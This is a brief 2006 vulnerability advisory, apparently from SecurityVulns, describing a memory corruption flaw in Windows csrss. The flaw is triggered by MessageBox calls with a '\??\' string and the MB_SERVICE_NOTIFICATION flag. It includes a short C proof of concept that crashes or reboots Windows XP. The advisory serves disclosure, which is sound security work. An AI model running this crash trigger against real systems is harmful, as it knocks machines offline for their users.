Microsoft Windows csrss (?) memory corruption exploited in-the-wild

Type securityvulns
Reporter Securityvulns
Modified 2006-12-16T00:00:00



On one of Russian forum security vulnerability is discussed in Microsoft Windows (Windows XP is tested). A vulnerability is caused by memory corruption is string beginning with "\?\" is send thorugh MessageBox API with MB_SERVICE_NOTIFICATION flag. It looks like some "debug" feature not cleaned out in final release and it seems to exploitable to code execution at kernel level. Code example below:

include <stdio.h>

include <windows.h>

int main(void){ int i; char bug1 [] ="\\??\\XXXX"; for(i = 0; i < 10; i ++) { MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION); } }

System hangs, crashes (BSOD) or reboots.

-- /\_/\ { , . } |\ +--oQQo->{ ^ }<-----+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles) +-------------o66o--+ / |/